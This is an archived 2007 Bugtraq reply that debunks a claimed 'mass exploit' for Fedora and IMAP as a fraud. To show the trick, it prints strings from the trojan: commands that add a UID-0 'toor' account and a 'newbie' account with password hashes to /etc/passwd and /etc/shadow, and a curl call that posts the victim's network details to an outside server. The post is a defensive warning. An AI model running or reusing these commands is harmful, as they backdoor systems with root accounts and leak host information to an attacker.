bugtraq August 2007 archive
Main Archive Page > Month Archives  > bugtraq archives
bugtraq: Re: Found nice mass exploits for fedora and imap

Re: Found nice mass exploits for fedora and imap

From: Jon Lewis <jlewis_at_nospam>
Date: Tue Aug 28 2007 - 15:24:15 GMT
To: linux0day@yahoo.co.uk


On Mon, 28 Aug 2007 linux0day@yahoo.co.uk wrote:

> Hello bugtraq,
> Did somebody realize a new mass exploits is realeased to public, it's seems work for fedora core 5, 6 and debian 3.1 with exploiting apache and imap.
>
> I've found this link somedays ago in a security forum, check this out
>
> http://rufy.com/images/mass/

Looks like a fraud to me. Nice try.

^M^@pache^@IMAP4rev1^@^@^@^@Root priviledge is needed - use your root user OK!
^@r^@target.txt^@^@^@^@Rename your target list filename to target.txt^@/etc/shadow^@^@newbie:$1$nLv4Q0aJ$rV4IkBgFH1NMo/HzHX35u/^@^@^@echo toor:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow^@^@^@^@echo newbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow^@^@echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd^@^@^@^@echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd^@/usr/bin/curl^@^@^@^@/usr/bin/curl -d "user=newbie&pass=novice&target=$(ifconfig -a)" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null^@^@^@^@Trying to connect to %s port %d


Jon Lewis | I route Senior Network Engineer | therefore you are Atlantic Net |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________